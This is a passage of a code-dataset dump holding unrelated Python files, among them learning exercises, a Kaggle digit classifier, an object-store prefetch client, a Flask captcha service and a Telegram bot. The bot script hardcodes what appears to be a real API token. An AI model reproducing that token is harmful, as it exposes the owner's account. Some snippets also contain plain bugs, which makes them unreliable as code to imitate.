x0\n","sub_path":"conjugate_gradient_method.py","file_name":"conjugate_gradient_method.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"373124436","text":"the_count = [1, 2, 3, 4, 5]\r\nfruits = ['apples', 'oranges', 'pears', 'apricots']\r\nchange = [1, 'pennies', 2, 'dimes', 3, 'quarters']\r\n\r\n# this first kind of for-loop goes through a list\r\nfor number in the_count:\r\n print(f\"This is count {number}\")\r\n\r\n# same as above\r\nfor fruit in fruits:\r\n print(f\"A fruit of type: {fruits}\")\r\n\r\n# also we can go through mixed lists too\r\n# notice we have to use {} since we don't know what's in it\r\nfor i in change:\r\n print(f\"I got {i}\")\r\n\r\n# we can also build lists, first start with an empty one\r\nelements = []\r\n\r\n# then use the range function to do 0 to 5 counts\r\nfor i in range(0, 6):\r\n print(f\"Adding {i} to the list.\")\r\n # append is a function that lists understand\r\n elements.append(i)\r\n\r\n# now we can print them out too\r\nfor i in elements:\r\n print(f\"Element was: {i}\")\r\n\r\n\r\n# Study Drills\r\n# 1. Take a look at how you used range. What does it do?\r\n# range generates a list of integers from the first argument to the second argument.\r\n\r\n# 2. Could you have avoided that for-loop entirely on line 22 and just assigned range(0,6) directly to elements\r\n# Depends on what you want elements for. In the case of using it as a for loop array, either works.\r\nelements2 = range(0, 6)\r\nprint(\"Type of original elements: \", type(elements))\r\nprint(\"Type of test elements: \", type(elements2))\r\n\r\nfor i in elements2:\r\n print(f\"Element was: {i}\")\r\n\r\n# 3. Find the Python documentation on lists and read about them. What other operations can you do to lists besides append?\r\n# Remove elements, sort them, search them.","sub_path":"Assignment3/Assignment3/ex32.py","file_name":"ex32.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38695374","text":"import pandas\n\nhand = pandas.read_csv(\"/Users/kaxil/Desktop/Royal Holloway/Kaggle/Digit Recognition/train.csv\")\ntrain= hand.iloc[0:28000,:]\ntest= hand.iloc[28000:420001,:]\n#print(hand.head(5))\n\n# Using Cross Validation \nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import cross_validation\n\nalg = RandomForestClassifier(random_state=1,n_estimators=600, min_samples_split=2, min_samples_leaf=2)\nscores = cross_validation.cross_val_score(alg, train.iloc[:,1:786],train[\"label\"],cv=5)\nprint(scores.mean()) \n\nalg.fit(train.iloc[:,1:786],train[\"label\"])\npredictions = alg.predict(test.iloc[:,1:786])\n\n# Calculating the accuracy of the Test Set\nfrom sklearn.metrics import accuracy_score\naccuracy_score(test.iloc[:,0],predictions)\n\n# Now predicting on Real Test Set\nreal_test = pandas.read_csv(\"/Users/kaxil/Desktop/Royal Holloway/Kaggle/Digit Recognition/test.csv\")\nr_predictions = alg.predict(real_test)\n\nsubmission = pandas.DataFrame({\n \"ImageId\": range(1,28001,1),\n \"Label\": r_predictions\n })\nsubmission.to_csv(\"/Users/kaxil/Desktop/kaggle.csv\", index=False)\n\n# Score on Kaggle : 0.96214\n","sub_path":"digit_recognizer.py","file_name":"digit_recognizer.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"362021908","text":"import numpy\r\nimport pandas as pd\r\nimport Calculations\r\nimport unittest\r\n\r\n#contains trips for the following locationID-> locationID\r\n#1->2\r\n#3->3\r\n#4->5\r\n#5->4\r\nclass Test_Equations(unittest.TestCase):\r\n\r\n def test_self(self): \r\n\r\n zonedf = pd.read_csv(r\"C:\\Users\\nick\\Documents\\GitHub\\NYC-Taxi-Tips\\mock_zones.csv\")\r\n y_datadf = pd.read_csv(r\"C:\\Users\\nick\\Documents\\GitHub\\NYC-Taxi-Tips\\mock_yellow_data.csv\")\r\n \r\n # test converting Borough name to zones\r\n zone_id_dict = Calculations.init_zone_dict(zonedf)\r\n zone_list = Calculations.convert_zone_ID(zone_id_dict, \"Cat\")\r\n \r\n # data contains two zone IDs of 2 and 3\r\n self.assertTrue(zone_list == [2, 3])\r\n\r\n # test converting Borough name to zones\r\n zone_id_dict = Calculations.init_zone_dict(zonedf)\r\n zone_list = Calculations.convert_zone_ID(zone_id_dict, \"Dog\")\r\n #data contains zone ID of 1\r\n self.assertTrue(zone_list == [1, 5])\r\n\r\n # Tests to complete at later time\r\n #test computing an average cost between Boroughs, using all three transport methods\r\n #data contains two costs of 10 and 20. There is only one transit method\r\n # y_dict = Calculations.calc_dict_costs(y_datadf, \"Dog\", \"Cat\")\r\n # y_cost = Calculations.compute_one_method_cost(\"Dog\", \"Cat\", zone_id_dict, y_dict)\r\n #self.assertTrue(Calculations.compute_avg_cost(\"Dog\", \"Cat\") == 15)\r\n #test computing an average cost between Boroughs, using only one transport method\r\n #data contains one data piece where cost is 25\r\n #self.assertTrue(Calculations.compute_one_method_cost(\"Fish\", \"Dog\", datadf) == 25)\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n\r\n\r\n","sub_path":"Test_Equations.py","file_name":"Test_Equations.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"99119772","text":"#!/usr/bin/python3\nimport requests\nimport swiftclient\nimport json\nimport d3n.config as cfg\nimport math\nfrom colorama import Fore, Style\n\nclass ObjectStore():\n def __init__(self):\n self.conn = None #self.connect_swift();\n self.token = None #self.get_token();\n self.metadata = {}\n pass\n\n def connect_swift(self):\n url = 'http://%s:%d/auth/1.0' % (cfg.rgw_host, cfg.rgw_port)\n conn = swiftclient.Connection(\n user=cfg.swift_user,\n key=cfg.swift_key,\n authurl=url)\n return conn;\n\n def get_token(self):\n token = self.conn.get_auth()[1]\n return token;\n\n def add_to_metadata_tree(self, metadata, name, size):\n path_element = name.split('/')\n meta_ptr = metadata\n for element in path_element:\n if element not in meta_ptr:\n meta_ptr[element] = {'objs': {}, 'size': 0}\n meta_ptr[element]['size'] += size\n meta_ptr = meta_ptr[element]['objs']\n\n def load_metadata(self):\n metadata = {}\n return metadata\n metadata_swift = self.conn.get_container(cfg.bucket_name)[1]\n for data in metadata_swift:\n full_name = data['name'];\n\n if full_name.endswith('_SUCCESS'): continue;\n self.add_to_metadata_tree(metadata, data['name'], data['bytes'])\n self.metadata = metadata\n return metadata\n\n def clear_cache(self):\n token = self.get_token()\n print('Clear the cache')\n url = 'http://%s:%d/swift/v1/' % (cfg.rgw_host, cfg.rgw_port)\n headers = {\"KARIZ_FLUSH_CACHE\": \"1\",\n \"X-Auth-Token\": token}\n\n r = requests.delete(url, headers=headers)\n\n def fetch_object_partial(self, bucket_name, obj_name, ofs_s, ofs_e):\n url = 'http://%s:%d/swift/v1/%s/%s' % (cfg.rgw_host, cfg.rgw_port, bucket_name, obj_name)\n headers = {\"range\": \"bytes=%d-%d\" % (ofs_s, ofs_e),\n \"X-Auth-Token\": self.token}\n r = requests.get(url, headers=headers)\n\n if r.status_code not in [200, 201, 204, 206]:\n raise NameError(Fore.LIGHTRED_EX + '\\t\\tPrefetch %s/%s %d-%d, failed with statuscode: %d'%(bucket_name, obj_name, ofs_s, ofs_e, r.status_code) + Style.RESET_ALL )\n\n def prefetch_dataset_stride(self, path, wave=-1, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n for obj in meta_ptr:\n n_cache_blocks = meta_ptr[obj]['size'] // cfg.cache_block_size\n ofs_s = (n_cache_blocks - stride) * cfg.cache_block_size if (stride != -1) else 0\n ofs_e = meta_ptr[obj]['size']\n self.fetch_object_partial(bucket_name=cfg.bucket_name, obj_name=path + '/' + obj, ofs_s=ofs_s, ofs_e=ofs_e)\n\n def prefetch_s3_dataset(self, path, yarn_map_byte, stride=0):\n if not path.startswith('s3a'):\n raise NameError('%s is not a valid s3 path'%(path))\n print(Fore.YELLOW, '\\tPrefetch %s, stride %d'%(path, stride), Style.RESET_ALL)\n #self.prefetch_dataset_map_stride(path.split(cfg.bucket_name+'/', 1)[1], yarn_map_byte, stridereturn )\n return self.prefetch_dataset_pstride(path.split(cfg.bucket_name+'/', 1)[1], yarn_map_byte, stride)\n\n\n\n def prefetch_dataset_pstride(self, path, yarn_map_byte, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n root_dir_size = 0\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n root_dir_size = meta_ptr[element]['size']\n meta_ptr = meta_ptr[element]['objs']\n\n n_tobe_prefetched_blocks = (root_dir_size*stride)//(cache_block_size*100)\n request_blocks = n_tobe_prefetched_blocks\n for obj in meta_ptr:\n n_maps = math.ceil(meta_ptr[obj]['size'] / yarn_map_byte) if meta_ptr[obj]['size'] > yarn_map_byte else 1\n map_byte = yarn_map_byte if meta_ptr[obj]['size'] > yarn_map_byte else meta_ptr[obj]['size']\n\n if n_tobe_prefetched_blocks == 0 or map_byte < cache_block_size:\n break;\n\n for i in range(0, n_maps):\n n_cache_blocks = map_byte // cfg.cache_block_size\n \n if n_cache_blocks > n_tobe_prefetched_blocks:\n n_cache_blocks = n_tobe_prefetched_blocks\n \n n_tobe_prefetched_blocks -= n_cache_blocks\n\n ofs_s = i*map_byte\n ofs_e = i*map_byte + n_cache_blocks*cfg.cache_block_size \n\n self.fetch_object_partial(bucket_name=cfg.bucket_name, \n obj_name=path + '/' + obj, ofs_s=ofs_s, ofs_e=ofs_e)\n\n print(Fore.LIGHTYELLOW_EX, '\\t\\ttotal cache blocks in %s is %d, requested: %d, prefetched: %d'%(path,\n root_dir_size//cache_block_size, request_blocks, (request_blocks - n_tobe_prefetched_blocks)), Style.RESET_ALL)\n return path, request_blocks, (request_blocks - n_tobe_prefetched_blocks)\n\n\n\n\n\n\n def prefetch_dataset_map_stride(self, path, yarn_map_byte, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n for obj in meta_ptr:\n n_maps = math.ceil(meta_ptr[obj]['size'] / yarn_map_byte) if meta_ptr[obj]['size'] > yarn_map_byte else 1\n\n map_byte = yarn_map_byte if meta_ptr[obj]['size'] > yarn_map_byte else meta_ptr[obj]['size']\n\n for i in range(0, n_maps):\n n_cache_blocks = map_byte // cfg.cache_block_size\n if n_cache_blocks < stride:\n n_cache_blocks = stride\n\n ofs_s = i * map_byte + (n_cache_blocks - stride) * cfg.cache_block_size if (\n stride != -1) else i * map_byte\n if ofs_s > meta_ptr[obj]['size']:\n ofs_s = i * map_byte\n\n ofs_e = (i + 1) * map_byte if ((i + 1) * map_byte < meta_ptr[obj]['size']) else meta_ptr[obj]['size']\n self.fetch_object_partial(bucket_name=cfg.bucket_name, obj_name=path + '/' + obj, ofs_s=ofs_s,\n ofs_e=ofs_e)\n\n def get_dataset_metadata(self, path, wave=-1, stride=0):\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n return meta_ptr\n","sub_path":"code/d3n/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625277822","text":"import telebot\n\nTOKEN = \"1120903746:AAEqlzOT0E9YsCKr0N7-er3JbgS94YztTfQ\"\nbot = telebot.TeleBot(TOKEN)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n keyboard = telebot.types.ReplyKeyboardMarkup(True)\n keyboard.row('about us', 'donations')\n bot.send_message(message.chat.id, 'hello! here you can record or leave your voice!', reply_markup=keyboard)\n\n\n@bot.message_handler(content_types=['text'])\ndef text_handler(message):\n text = message.text.lower()\n chat_id = message.chat.id\n if text == \"about us\":\n bot.send_message(chat_id,\n 'we are a collection of proactive people who believe in the future and the development of AI '\n '. your voices that you leave here will help the creators of voice assistans, synyhesizers. '\n 'who knows, maybe in a year we will tell our amazing story in YOUR VOICE')\n elif text == \"donations\":\n bot.send_message(chat_id, 'https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=2JVSCG6WL7XBW')\n else:\n bot.send_message(message.chat.id, \"just send me your voice\")\n\n\n@bot.message_handler(content_types=['voice', 'audio'])\ndef text_handler(message):\n chat_id = message.chat.id\n bot.send_message(chat_id, \"thank's a lot, you also can send me more voices!\")\n print('+1')\n\n\nbot.polling()\n","sub_path":"Новая папка (2)/teleg/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374811567","text":"parents = {}\nroots = {}\n\ndef find_roots(parents, person):\n root = person\n while root in parents:\n root = parents[root]\n p = person\n while p != root:\n parent = parents[p]\n parents[p] = root\n p = parent\n return root\nmaxs = 1\nfor i in range(int(input())):\n l, r = [int(x) for x in input().split()]\n if l not in parents:\n parents[l] = -1\n roots[l] = 1\n if r not in parents:\n parents[r] = -1\n roots[r] = 1\n print(parents, roots)\n rootl = find_roots(parents, l)\n rootr = find_roots(parents, r)\n print(rootl, rootr)\n if rootl != rootr:\n parents[rootl] = root[r]\n roots[rootr] = roots[rootr] + roots[rootl]\n del roots[rootl]\n maxs = max(maxs, roots[rootr])\n else:\n result = maxs\n print(result)\n\n","sub_path":"Hackerrank/InterviewKit/friend_circle_quaries.py","file_name":"friend_circle_quaries.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615615327","text":"# coding: utf-8\r\n\"\"\"\r\npython: 3.6\r\nflask: 1.0.2\r\n\"\"\"\r\nfrom PIL import Image\r\nfrom flask import Flask\r\nfrom werkzeug.contrib.fixers import ProxyFix\r\nfrom flask import request, jsonify, render_template, redirect\r\nfrom config import *\r\nfrom predict import predict\r\n\r\nprint = logger.info\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/GetCaptcha', methods=[\"POST\"])\r\ndef locate():\r\n if request.method == \"POST\":\r\n img = request.files['img']\r\n img_path = os.path.join(IMAGE_DIR, CAPTCHA_NAME)\r\n img.save(img_path)\r\n captcha_input = predict(img_path)\r\n return jsonify({\r\n 'Captcha': captcha_input,\r\n 'Message': '',\r\n 'Success': True,\r\n })\r\n else:\r\n return jsonify({\r\n 'Captcha': '',\r\n 'Message': '请求方法错误',\r\n 'Success': False,\r\n })\r\n\r\n\r\nif __name__ == '__main__':\r\n app.wsgi_app = ProxyFix(app.wsgi_app)\r\n # 广外linux端口设置为38015,河北linux端口设置为7101,外网访问相同端口\r\n app.run(host='0.0.0.0', port=7101, threaded=True)\r\n","sub_path":"项目代码/linux代码/SougouVerifycode/run_captcha.py","file_name":"run_captcha.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130739738","text":"__author__ = 'kyota'\n\nimport numpy as np\nimport math\nimport cv2\n\nclass SKEL:\n def __init__(self, file_name):\n # print 'construct skel'\n self.vertices = np.ndarray((0,4))\n self.projected_vertices = np.ndarray((0,3))\n self.lines = np.ndarray((0,4))\n self.matrix = np.ndarray((4,4))\n\n file = open(file_name, \"r\")\n file.close\n lines = file.readlines()\n arr = []\n row = 0\n v_num = 0\n p_num = 0\n # for i in range(0, len(lines)):\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n _arr = line.split(\" \")\n if _arr.__contains__(''):\n _arr.remove('')\n if _arr[0].__contains__(\"#\"):\n # print 'skip'\n continue\n row += 1\n if row == 1:\n type = _arr[0]\n if row == 2:\n v_num = int(_arr[0])\n p_num = int(_arr[1])\n if row > 2 and row <= 2 + v_num:\n _arr = map(int, _arr)\n self.vertices = np.concatenate((self.vertices, [_arr]), axis=0)\n if row > 2+v_num and row <= 2+v_num+p_num:\n _arr = map(int, _arr)\n self.lines = np.concatenate((self.lines, [_arr]), axis=0)\n\n def set_matrix(self, matrix):\n self.matrix = matrix\n\n def transform(self, T):\n # print len(self.vertices)\n for i in range(0, len(self.vertices)):\n self.vertices[i] = np.dot(T, self.vertices[i])\n\nif __name__ == \"__main__\":\n skel = SKEL(\"../cg.skel\")\n","sub_path":"cpp_practices/asign0529/python/skel.py","file_name":"skel.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339293190","text":"import random\nimport argparse\n\nimport torch\nimport numpy as np\nimport pandas as pd\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom torchtext.data import Field\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.metrics import (accuracy_score, classification_report,\n confusion_matrix)\n\nfrom simple_lstm import LSTM\nfrom simple_lstm import (save_metrics, load_metrics, save_checkpoint,\n load_checkpoint)\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('--epochs', type=int, default = 5, help='Num Epochs')\nparser.add_argument('--lr', type=float, default = 0.0005, help='Learning rate')\nparser.add_argument('--batch_size', type=int, default = 64, help='Batch size')\nparser.add_argument('--vocab_size', type=int, default = 3000,\n help='Vocab size for lstm')\nparser.add_argument('--output_path', type=str, default = \"models\",\n help='Output path')\nparser.add_argument('--aug_test', type=int, default=1,\n help='Whether or not to cf-augment the test set (0 or 1)')\nargs = parser.parse_args()\n\nEPOCHS = args.epochs\nLR = args.lr\nOUT_DIR = args.output_path\nVOCAB_SIZE = args.vocab_size\nBSZ = args.batch_size\nAUG_TEST = args.aug_test\n\nrandom.seed(123)\nnp.random.seed(123)\ntorch.manual_seed(123)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nparams = f'epochs={EPOCHS},lr={LR},vocab={VOCAB_SIZE},bsz={BSZ},aug_test={AUG_TEST}'\nprint(f'params: {params}')\nmodel_name = f'imdb-pretrain'\n\n# load full dataset\npath = 'data/full_imdb_{}.csv'\ntrain_df = pd.read_csv(path.format('train'))\nX_train = train_df['text'].tolist()\ny_train = train_df['label'].tolist()\n\nval_df = pd.read_csv(path.format('val'))\nX_val = val_df['text'].tolist()\ny_val = val_df['label'].tolist()\n\n# always use the same augmented test set\nif AUG_TEST:\n test_path = 'data/aug_test.csv'\nelse:\n test_path = 'data/fact_test.csv'\ntest_df = pd.read_csv(test_path)\ny_test = test_df['label'].tolist()\n\nprint('Dataset size:')\nprint(f'{len(y_train)} train, {len(y_val)} val, {len(test_df)} test')\n\n# setup tokenizer\ntokenizer = Tokenizer(num_words=VOCAB_SIZE, oov_token=True)\ntokenizer.fit_on_texts(X_train)\n\n# tokenize, convert to sequences, and pad\n# note: using the same padding for factual/counterfactual data\ndef get_padded_sequences(text):\n sequences = tokenizer.texts_to_sequences(text)\n padding = max([len(i) for i in sequences])\n data = pad_sequences(sequences, maxlen=padding, padding='post')\n return data\n\n\ndef get_cf_padded_sequences(df):\n sequences = tokenizer.texts_to_sequences(df['text'])\n cf_sequences = tokenizer.texts_to_sequences(df['cf-text'])\n padding = max([len(i) for i in sequences] +\n [len(j) for j in cf_sequences])\n data = pad_sequences(sequences, maxlen=padding, padding='post')\n cf_data = pad_sequences(cf_sequences, maxlen=padding, padding='post')\n\n return data, cf_data\n\ntrain_sequences = get_padded_sequences(X_train)\nval_sequences = get_padded_sequences(X_val)\ntest_sequences, cf_test_sequences = get_cf_padded_sequences(test_df)\n\n\ndef get_dataloader(data, labels, batch_size):\n batches = []\n for i in range(0, len(data), batch_size):\n text_tensor = torch.tensor(data[i:i + batch_size], device=device,\n dtype=torch.long)\n length_tensor = torch.tensor([len(j) for j in data[i:i+batch_size]],\n device=device)\n labels_tensor = torch.tensor(labels[i:i + batch_size], device=device,\n dtype=torch.float)\n batches.append((text_tensor, length_tensor, labels_tensor))\n return batches\n\n\ndef get_cf_dataloader(data, cf_data, labels, batch_size):\n batches = []\n for i in range(0, len(data), batch_size):\n text_tensor = torch.tensor(\n data[i:i + batch_size], device=device, dtype=torch.long)\n length_tensor = torch.tensor(\n [len(j) for j in data[i:i+batch_size]], device=device)\n labels_tensor = torch.tensor(\n labels[i:i + batch_size], device=device, dtype=torch.float)\n\n cf_text_tensor = torch.tensor(\n cf_data[i:i + batch_size], device=device, dtype=torch.long)\n cf_length_tensor = torch.tensor(\n [len(j) for j in cf_data[i:i+batch_size]], device=device)\n\n batches.append((text_tensor, length_tensor, cf_text_tensor,\n cf_length_tensor, labels_tensor))\n return batches\n\n\ntrain_loader = get_dataloader(train_sequences, y_train, BSZ)\nval_loader = get_dataloader(val_sequences, y_val, BSZ)\ntest_loader = get_cf_dataloader(test_sequences, cf_test_sequences, y_test, BSZ)\n\n# train and test ------------------------------------------------------------- #\ndestination_folder = OUT_DIR\ncriterion = torch.nn.BCELoss()\n\ndef train(model,\n optimizer,\n criterion = criterion,\n train_loader = train_loader,\n train_batches = len(train_loader),\n valid_loader = val_loader,\n valid_batches = len(val_loader),\n num_epochs = 5,\n eval_every = len(train_loader) // 2,\n file_path = destination_folder,\n best_valid_loss = float(\"Inf\")):\n\n # initialize running values\n running_loss = 0.0\n valid_running_loss = 0.0\n global_step = 0\n train_loss_list = []\n valid_loss_list = []\n global_steps_list = []\n\n # training loop\n model.train()\n for epoch in range(num_epochs):\n for text, text_len, labels in train_loader:\n labels = labels.to(device)\n text = text.to(device)\n\n output = model(text, text_len)\n output = torch.sigmoid(output)\n loss = criterion(output, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # update running values\n running_loss += loss.item()\n global_step += 1\n\n # evaluation step\n if global_step % eval_every == 0:\n model.eval()\n with torch.no_grad():\n # validation loop\n for text, text_len, labels in valid_loader:\n labels = labels.to(device)\n text = text.to(device)\n\n output = model(text, text_len)\n output = torch.sigmoid(output)\n\n loss = criterion(output, labels)\n valid_running_loss += loss.item()\n\n # evaluation\n average_train_loss = running_loss / eval_every\n average_valid_loss = valid_running_loss / valid_batches\n train_loss_list.append(average_train_loss)\n valid_loss_list.append(average_valid_loss)\n global_steps_list.append(global_step)\n\n # resetting running values\n running_loss = 0.0\n valid_running_loss = 0.0\n model.train()\n\n # print progress\n print('Epoch [{}/{}], Step [{}/{}], Train Loss: {:.4f}, Valid Loss: {:.4f}'\n .format(epoch+1, num_epochs, global_step,\n num_epochs*train_batches, average_train_loss,\n average_valid_loss))\n\n # checkpoint\n if best_valid_loss > average_valid_loss:\n best_valid_loss = average_valid_loss\n save_checkpoint(file_path + f'/model-{model_name}.pt',\n model, optimizer, best_valid_loss)\n save_metrics(file_path + f'/metrics-{model_name}.pt',\n train_loss_list, valid_loss_list,\n global_steps_list)\n\n save_metrics(file_path + f'/metrics-{model_name}.pt', train_loss_list,\n valid_loss_list, global_steps_list)\n print('Finished Training!')\n\n# Evaluation Function\ndef evaluate(model, test_loader, version='title', threshold=0.5):\n y_true_fact = []\n\n y_pred_fact = []\n y_pred_cfact = []\n\n y_raw_fact = []\n y_raw_cfact = []\n\n model.eval()\n with torch.no_grad():\n for text, text_len, cf_text, cf_text_len, labels in test_loader:\n # labels\n labels = labels.to(device)\n y_true_fact.extend(labels.tolist())\n\n # factual predictions\n text = text.to(device)\n output = model(text, text_len)\n\n sigmoid_out = torch.sigmoid(output)\n y_raw_fact.extend(sigmoid_out.tolist())\n\n output = (sigmoid_out > threshold).int()\n y_pred_fact.extend(output.tolist())\n\n # cf predictions\n cf_text = cf_text.to(device)\n cf_output = model(cf_text, cf_text_len)\n\n cf_sigmoid_out = torch.sigmoid(cf_output)\n y_raw_cfact.extend(cf_sigmoid_out.tolist())\n\n cf_output = (cf_sigmoid_out > threshold).int()\n y_pred_cfact.extend(cf_output.tolist())\n\n\n print('Classification Report:')\n print(classification_report(y_true_fact, y_pred_fact, labels=[1, 0],\n digits=4))\n\n # CF Consistency:\n # fraction of cf pairs that receive different predictions\n # 1 indicates consistency, 0 indicates lack of consistency\n # note all pairs are asymmetric\n print(f'CF Consistency: {np.not_equal(y_pred_fact, y_pred_cfact).mean()}')\n\n # CF Gap:\n # mean absolute difference in prediction\n # larger is better\n # differences = []\n # for batch_a, batch_b in zip(y_fact_out, y_cfact_out):\n # batch_diff = (batch_a - batch_b).abs().tolist()\n # differences.extend(batch_diff)\n mean_difference = np.abs(np.subtract(y_raw_fact, y_raw_cfact)).mean()\n print(f'CF Gap: {mean_difference}')\n\n # save output\n results_df = pd.DataFrame({\n 'y_true_fact': y_true_fact,\n 'y_pred_fact': y_pred_fact,\n 'y_pred_cfact': y_pred_cfact,\n 'y_raw_fact': y_raw_fact,\n 'y_raw_cfact': y_raw_cfact,\n })\n\n results_df.to_csv(f'results/{model_name}.csv', index=False)\n\n\nmodel = LSTM(vocab_size = VOCAB_SIZE).to(device)\noptimizer = optim.Adam(model.parameters(), lr = LR)\n\ntrain(model=model, optimizer=optimizer, num_epochs = EPOCHS)\ntrain_loss_list, valid_loss_list, global_steps_list = load_metrics(\n destination_folder + f'/metrics-{model_name}.pt')\n\nbest_model = LSTM(vocab_size=VOCAB_SIZE).to(device)\noptimizer = optim.Adam(best_model.parameters(), lr=LR)\n\nload_checkpoint(destination_folder + f'/model-{model_name}.pt', best_model,\n optimizer)\nevaluate(best_model, test_loader)\n","sub_path":"imdb/train_full_imdb.py","file_name":"train_full_imdb.py","file_ext":"py","file_size_in_byte":10853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9112487","text":"a = input(\"input file name: \")\ninfile = open(\"C:\\\\Users\\\\sts08\\\\Desktop\\\\%s\" %a,\"r\")\ncnt = 0\nfor line in infile:\n line = line.rstrip()\n w_list = line.split()\n for c in w_list:\n cnt+=len(c)\ninfile.close()\n\nprint(\"There are %d letters\" %cnt)\n","sub_path":"프실 1/8주차 실습과제 2.py","file_name":"8주차 실습과제 2.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239151514","text":"# 先进行子短语频数减去父短语频数的操作\r\nfrom tqdm import tqdm\r\n\r\nfile_path_1 = 'D:\\文件夹汇总\\项目\\军事知识图谱\\爬虫\\环球军事网\\huanqiu_1\\\\n-gram_frequency.txt'\r\nfile_path_2 = 'D:\\文件夹汇总\\项目\\军事知识图谱\\爬虫\\环球军事网\\huanqiu_1\\\\n-gram_frequency_operation.txt'\r\nfh_1 = open(file_path_1,'r',encoding='UTF-8')\r\nfh_2 = open(file_path_2,'a+',encoding='UTF-8')\r\nlines = fh_1.readlines()\r\n\r\nword_2 = {}\r\nword_3 = {}\r\nword_4 = {}\r\nword_5 = {}\r\nword_6 = {}\r\nword_7 = {}\r\n\r\nline_2 = lines[0].strip().split(',')\r\nfre_2 = lines[1].strip().split(',')\r\nline_3 = lines[3].strip().split(',')\r\nfre_3 = lines[4].strip().split(',')\r\nline_4 = lines[6].strip().split(',')\r\nfre_4 = lines[7].strip().split(',')\r\nline_5 = lines[9].strip().split(',')\r\nfre_5 = lines[10].strip().split(',')\r\nline_6 = lines[12].strip().split(',')\r\nfre_6 = lines[13].strip().split(',')\r\nline_7 = lines[15].strip().split(',')\r\nfre_7 = lines[16].strip().split(',')\r\n\r\nprint(fre_2)\r\n\r\nn2 = len(line_2)\r\nfor i in range(n2):\r\n if int(fre_2[i]) > 50:\r\n word_2[line_2[i]] = int(fre_2[i])\r\n\r\nn3 = len(line_3)\r\nfor i in range(n3):\r\n if int(fre_3[i]) > 50:\r\n word_3[line_3[i]] = int(fre_3[i])\r\n\r\nn4 = len(line_4)\r\nfor i in range(n4):\r\n if int(fre_4[i]) > 50:\r\n word_4[line_4[i]] = int(fre_4[i])\r\n\r\nn5 = len(line_5)\r\nfor i in range(n5):\r\n if int(fre_5[i]) > 50:\r\n word_5[line_5[i]] = int(fre_5[i])\r\n\r\nn6 = len(line_6)\r\nfor i in range(n6):\r\n if int(fre_6[i]) > 50:\r\n word_6[line_6[i]] = int(fre_6[i])\r\n\r\nn7 = len(line_7)\r\nfor i in range(n7):\r\n if int(fre_7[i]) > 50:\r\n word_7[line_7[i]] = int(fre_7[i])\r\n\r\n\r\n# 对字长为2的序列操作\r\nfor k2, v2 in tqdm(word_2.items()):\r\n for k3,v3 in word_3.items():\r\n if k2 in k3 :\r\n word_2[k2] = v2-v3\r\n\r\n for k4,v4 in word_4.items():\r\n if k2 in k4 :\r\n word_2[k2] = v2-v4\r\n\r\n for k5,v5 in word_5.items():\r\n if k2 in k5 :\r\n word_2[k2] = v2-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k2 in k6 :\r\n word_2[k2] = v2-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k2 in k7 :\r\n word_2[k2] = v2-v7\r\n\r\n# 对字长为3的序列操作\r\nfor k3, v3 in tqdm(word_3.items()):\r\n\r\n for k4,v4 in word_4.items():\r\n if k3 in k4 :\r\n word_3[k3] = v3-v4\r\n\r\n for k5,v5 in word_5.items():\r\n if k3 in k5 :\r\n word_3[k3] = v3-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k3 in k6 :\r\n word_3[k3] = v3-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k3 in k7 :\r\n word_3[k3] = v3-v7\r\n\r\n\r\n\r\n# 对字长为4的序列操作\r\nfor k4, v4 in 